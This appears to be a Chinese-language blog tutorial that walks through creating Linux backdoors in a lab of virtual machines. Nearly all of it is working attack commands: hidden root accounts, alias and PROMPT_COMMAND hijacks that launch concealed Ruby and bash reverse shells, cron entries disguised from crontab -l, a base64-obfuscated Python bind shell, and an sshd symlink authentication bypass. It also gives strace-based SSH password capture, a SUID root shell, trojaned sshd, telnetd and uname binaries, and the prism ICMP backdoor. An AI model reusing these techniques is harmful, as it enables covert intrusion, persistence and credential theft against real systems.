这篇文章主要介绍“如何理解Linux系统后门”,在日常操作中,相信很多人在如何理解Linux系统后门问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”如何理解Linux系统后门”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
host系统:manjaro linux(192.168.242.1)
虚拟机管理程序:vmware workstation 16
虚拟机:CentOS 7(192.168.242.133)、ubuntu(192.168.242.143)、CentOS 6.5(192.168.242.132)
1、 直接创建
useradd -o -u 0 backdoor && echo "Eu2xa2fu@#" | passwd backdoor --stdin
经验证可以正常登录。
//通过交互式方式创建用户并设置口令
useradd -o -u 0 test1
passwd test1
2、 将命令与PROMPT_COMMAND结合
(1)写入/root/.bashrc文件
vi /root/.bashrc //编辑root用户的配置文件,加入下面的内容
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
保存退出
source /root/.bashrc //执行文件中的指令,账户被创建。
以后每次切换到root时都会执行/root/.bashrc中的指令,从而创建账户。
(2)验证
cat /etc/passwd | grep hack
后门账户创建成功。
useradd -p 0`openssl passwd -1 -salt 'abc' pass1234` -u 0 -o -g root -G root -s /bin/bash hack
创建成功。
//使用ruby实现反弹连接(使用netcat接收)。ruby的反弹连接建立后会转入后台,不暴露任何痕迹,非常隐蔽,推荐使用。注意内部的双引号都是"'"'"。
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
//使用ruby实现反弹连接(使用msfconsole接收),注意双引号的嵌套。
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end';};alerts"
nc -l -p 5555
由于alias命令可以查看当前的别名,会让ls的反弹指令暴露。因此需要劫持alias命令,让它的输出中不显示反弹的指令。另外unalias命令会清除别名,因此也要对其进行劫持,避免ls的别名被清除。
//若先创建alias的别名,那么alias就失去了原来alias的功能,则unalias的别名就无法创建了
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
不会清除ls别名。
vi /tmp/.alias.txt //加入下面的内容
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias vi='vim'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
保存退出
alias alias="cat /tmp/.alias.txt"
vi /etc/yum/yum-update.rc //创建文件,加入别名设置
alias ls="alerts(){ ls $* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
alias alias="cat /tmp/.alias.txt"
保存退出
touch -acmr version-groups.conf yum-update.rc
被攻击者操作:
攻击者获得反弹shell:
su //切换到root
echo 'bash -i >& /dev/tcp/192.168.242.1/5555 0>&1' > ~/.bashrc
nc -l -p 5555
su //管理员先以普通用户身份登录,之后切换到root
nc -l -p 5555
得到shell,说明.bashrc文件中的反弹指令被执行。
1、添加非隐藏的计划任务
crontab -l | { cat; echo "*/1 * * * * bash -i >& /dev/tcp/192.168.242.1/5555 0>&1"; } | crontab -
//每分钟执行一次反弹连接
计划任务添加成功。
nc -l -p 5555 //攻击者监听本地端口
得到shell,说明计划任务被执行。
2、以隐藏的方式加入计划任务
(crontab -l;printf "*/1 * * * * bash -i >& /dev/tcp/192.168.242.1/5555 0>&1;\rno crontab for `whoami`%100c\n")|crontab -
管理员使用crontab -l看不到添加的的计划任务。
解释:
crontab将用户的计划任务保存到“/var/spool/cron/用户名”文件中。crontab -l实际上是使用cat命令查看这个文件:
但使用vim命令查看,这个文件的内容是:
使用cat命令的-A选项也可以看到文件的真正内容:
cat -A /var/spool/cron/root
攻击者得到反弹连接:
sh -c "echo '* * * * * root cd /tmp && mknod backpipe p && nc 192.168.242.1 5555 0<backpipe | /bin/bash 1>backpipe' >> /etc/crontab"
攻击者接收反弹连接
msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.242.1
set lport 5555
exploit
一分钟之后即可获得连接:
vi ~user1/.bashrc //修改配置文件,加入下面的内容
export PROMPT_COMMAND="lsof -i:1025 &>/dev/null || (python -c \"exec('aW1wb3J0IHNvY2tldCxvcyxzeXMKcz1zb2NrZXQuc29ja2V0KCkKcy5iaW5kKCgiIiwxMDI1KSkKcy5saXN0ZW4oMSkKKGMsYSk9cy5hY2NlcHQoKQp3aGlsZSAxOgogZD1jLnJlY3YoNTEyKQogaWYgJ2V4aXQnIGluIGQ6CiAgcy5jbG9zZSgpCiAgc3lzLmV4aXQoMCkKIHI9b3MucG9wZW4oZCkucmVhZCgpCiBjLnNlbmQocikK'.decode('base64'))\" 2>/dev/null &)"
保存退出
source ~/.bashrc //使配置立即生效
netstat -an | grep :1025 //查看1025端口的监听情况。
每次user1用户登录都会自动执行其.bashrc文件中的指令,也就是说,开始监听1025端口。
nc 192.168.242.133 1025
连接成功,得到shell。
原理:Linux软链接ssh后门需要ssh支持PAM认证。将sshd软链接名称设置为su,这样在命令启动后会到PAM配置中查找是否存在对应su的配置信息。
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
开始监听31337端口。
也可以使用下面的命令监听端口:
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oPort=12345
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=12345
ssh -p 31337 root@192.168.242.133
使用root/bin/ftp/mail当用户名,密码随意,就可登陆。
被攻击者:manjaro 20系统,编辑用户的.bashrc配置文件。
vi ~/.bashrc //文件末尾加入下面的指令
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
保存退出
source ~/.bashrc
ssh user1@192.168.242.133 //正常用户执行ssh连接,在/tmp目录生成记录
cat /tmp/sshpwd-2411月111606192953.log | grep -n password | grep write //查找指定信息所在的行,这里是第89行
less /tmp/sshpwd-2411月111606192953.log
输入89g,跳到第89行
密码就在这里:123456
ssh-keygen -t rsa //生成公私密钥对,输入密钥短语
vi /etc/ssh/sshd_config //编辑配置文件,设置如下信息
PermitRootLogin yes
StrictModes no
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys
RSAAuthentication yes
保存退出
注意:
(1)RSAAuthentication yes这一行需要手写到配置文件中最后一行。
(2)AuthorizedKeysFile参数中,%h代表用的主目录,%h/后面有个点,没有点将会出现“Permission Denied (publickey)”的错误提示,无法连接。
(3)注意取消行首的注释符。
systemctl restart sshd //重新启动ssh服务
配置生效。
scp ~/.ssh/id_rsa.pub root@192.168.242.133:~ //攻击者将本地用户的公钥上传到服务器
上传成功。注意传到用户的主目录即可,不要复制到~/.ssh/id_rsa.pub,这样会覆盖目标主机自己的公钥文件。注意id_rsa.pub文件不是隐藏的。
也可以使用 ssh-copy-id 将自己的公钥复制到目标系统
ssh-copy-id -i ~/.ssh/id_rsa.pub root@192.168.242.133
cat /root/id_rsa.pub >> ~/.ssh/authorized_keys
systemctl restart sshd //重启ssh服务
ssh -i /root/.ssh/id_rsa root@192.168.242.133
//由于公钥上传到了服务器root账户的home目录,所以这里要指定root用户。如果不指定,则默认使用攻击者当前的用户—user1,而前面未向服务器的user1用户的home目录上传公钥,这样要登录还得要账户口令验证。
sudo echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
sudo gcc -o privshell privshell.c //编译为可执行文件,名为privshell
sudo chown root:root privshell && sudo chmod u+s privshell
./privshell
cd /usr/lib/systemd/system
touch backdoor.service
vi backdoor.service //编辑文件,加入下面的内容
[Unit]
Description=Very important backdoor.
After=network.target
[Service]
Type=forking
ExecStart=nc -e /bin/bash 192.168.242.1 5555 >/dev/null 2>&1
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target
保存退出
chmod +x /usr/lib/systemd/system/backdoor.service
systemctl daemon-reload //重新读取服务信息
nc -l -p 5555
systemctl enable backdoor
systemctl start backdoor
TCP_Wrappers是一个工作在应用层的安全工具,它对某些具体应用或者服务可以起到一定的防护作用。比如说针对ssh、telnet、FTP等服务的请求,都会先受到TCP_Wrappers的拦截。
TCP_Wrappers有一个TCP的守护进程叫作tcpd。以telnet为例,每当有telnet的连接请求时,tcpd即会截获请求,先读取系统管理员所设置的访问控制文件,合乎要求,则会把这次连接原封不动的转给真正的telnet进程,由telnet完成后续工作;如果这次连接发起的ip不符合访问控制文件中的设置,则会中断连接请求。
vi /etc/hosts.allow //编辑配置文件,加入下面的内容
ALL: ALL: spawn (bash -c "/bin/bash -i >& /dev/tcp/192.168.242.1/443 0>&1") & :allow
保存退出。
上面指令的含义是,允许所有的连接,并且当连接出现时,启动bash进行反弹连接。
sudo nc -l -p 443
ssh 192.168.242.133 //连接目标服务器的22端口
无需输入口令
成功获取反弹shell,权限为root。
apt-get install rsh-client rsh-server xinetd
touch /etc/xinetd.d/rsh && vi /etc/xinetd.d/rsh //加入下面的内容
# default: on
# descrīption: The rshd server is the server for the rcmd(3) routine and, \
# consequently, for the rsh(1) program. The server provides \
# remote execution facilities with authentication based on \
# privileged port numbers from trusted hosts.
service shell
{
disable = no
socket_type = stream
wait = no
user = root
log_on_success += USERID
log_on_failure += USERID
server = /usr/sbin/in.rshd
}
/etc/xinetd.d/rlogin
# default: on
# descrīption: rlogind is the server for the rlogin(1) program. The server \
# provides a remote login facility with authentication based on \
# privileged port numbers from trusted hosts.
service login
{
disable = no
socket_type = stream
wait = no
user = root
log_on_success += USERID
log_on_failure += USERID
server = /usr/sbin/in.rlogind
}
/etc/xinetd.d/rexec
# default: off
# descrīption: Rexecd is the server for the rexec(3) routine. The server \
# provides remote execution facilities with authentication based \
# on user names and passwords.
service exec
{
disable = no
socket_type = stream
wait = no
user = root
log_on_success += USERID
log_on_failure += USERID
server = /usr/sbin/in.rexecd
}
保存退出
/etc/init.d/xinetd restart //重启服务,rsh等服务随之启动
vi /root/.rhosts //编辑文件,加入下面的内容
+ +
保存退出
rsh 192.168.242.143 date //远程执行系统命令
执行成功
rsh 192.168.242.143 /bin/bash //获取远程系统的shell
后门创建成功。
sudo apt-get install xinetd telnetd
dpkg -L xinetd | grep '/usr/sbin/\|/etc/' //查看xinetd的可执行文件和配置文件
/usr/sbin/xinetd
/usr/sbin/itox
/usr/sbin/xconv.pl
/etc/init
/etc/init/xinetd.conf
/etc/xinetd.conf
/etc/init.d
/etc/init.d/xinetd
/etc/default
/etc/default/xinetd
/etc/xinetd.d
/etc/xinetd.d/daytime
/etc/xinetd.d/time
/etc/xinetd.d/discard
/etc/xinetd.d/echo
/etc/xinetd.d/chargen
dpkg -L telnetd | grep '/usr/sbin\|/etc/' //查看telnetd的可执行文件和配置文件
/usr/sbin
/usr/sbin/in.telnetd
telnetd软件包只有可执行文件,没有配置文件。
vi /etc/xinetd.d/telnet //默认不存在,创建并编辑,加入下面内容
# default: on
# description: The telnet server serves telnet sessions; it uses \
# unencrypted username/password pairs for authentication.
service telnet
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.telnetd
log_on_failure += USERID
}
保存退出。
/etc/init.d/xinetd restart //重启xinetd服务
netstat -an | grep :23 //查看端口监听情况
vi /etc/securetty //加入下面内容
pts/0
pts/1
pts/2
pts/3
保存退出。
service xinetd restart //重启服务
这样root就可以通过pts/0到pts/3这几个终端登录linux了。
touch telnetd.sh && chmod +x telnetd.sh
vi telnetd.sh //编辑文件,加入下面的内容
#!/bin/bash
socat udp-connect:192.168.242.1:5555 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
/usr/sbin/in.telnetd
保存退出。
vi /etc/xinetd.d/telnet
server = /usr/sbin/in.telnetd
改为
server = /home/user1/telnetd.sh
保存退出。
/etc/init.d/xinetd restart //重启xinetd服务
netstat -an | grep :23 //查看端口监听情况
nc -ul -p 5555
telnet 192.168.242.143
telnet服务命令被触发,执行服务配置文件中指定的脚本。
mv /usr/sbin/sshd /usr/bin/ //将真正的sshd程序转移
touch /usr/sbin/sshd //创建假冒的sshd脚本文件
vi /usr/sbin/sshd //编辑文件,加入下面的内容
#!/usr/bin/perl
exec"/bin/bash"if(getpeername(STDIN)=~/^..LF/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
保存退出
chmod +x /usr/sbin/sshd //给予执行权限
systemctl restart sshd //重启ssh服务,实际上执行了恶意脚本中的代码
socat STDIO TCP4:192.168.242.133:22,sourceport=19526
注意必须加上源端口参数。
touch /usr/local/bin/uname //创建后门脚本文件
vi /usr/local/bin/uname //编辑文件,加入下面的内容
#!/bin/bash
nc -l -v -p 4444 -e /bin/bash 2>/dev/null &
socat TCP4-Listen:3177,fork EXEC:/bin/bash 2>/dev/null &
socat SCTP-Listen:1177,fork EXEC:/bin/bash 2>/dev/null &
perl -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' 2>/dev/null &
/bin/uname $@
保存退出。上面的四条监听端口的命令选择执行其中一条就可以。
uname -r
可以看到,执行是正常的。但是端口也暗中开始监听了:
nc 192.168.242.133 4444
四个端口都可以连接。
https://github.com/andreafabrizi/prism/
gcc -DDETACH -m32 -Wall -s -o prism prism.c
编译成功,生成了可执行文件。
scp prism user1@192.168.242.132:/home/user1/
nc -l -p 6666
yum install glibc.i686
./prism //以root身份运行
运行后没有提示
python2 sendPacket.py 192.168.242.132 p4ssw0rd 192.168.242.1 6666
连接口令默认为p4ssw0rd。
最初的sendPacket.py发出的是icmp包。抓包确认:
第一个包是ICMP request,包的内容中可以看到反弹地址和连接口令。
后面的包就都是TCP协议的数据包了。
控制端发出cat /etc/passwd命令,从受控端回传给控制端的数据包来看,能看出源、目的IP地址,源、目的端口。并且还能看到数据,是cat /etc/passwd命令的结果。
所以prism只是通过icmp进行连接的触发,后续的命令和都是通过TCP协议传输的。该软件适用于攻击者无法主动连接到服务器的TCP/UDP端口,但是可以ping通服务器的情况。prism在服务器上监听icmp请求,并验证连接口令。验证通过之后服务器主动连接到攻击者的VPS,攻击者得到反弹shell。由此可见prism是一个icmp后门。
到此,关于“如何理解Linux系统后门”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注亿速云网站,小编会继续努力为大家带来更多实用的文章!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。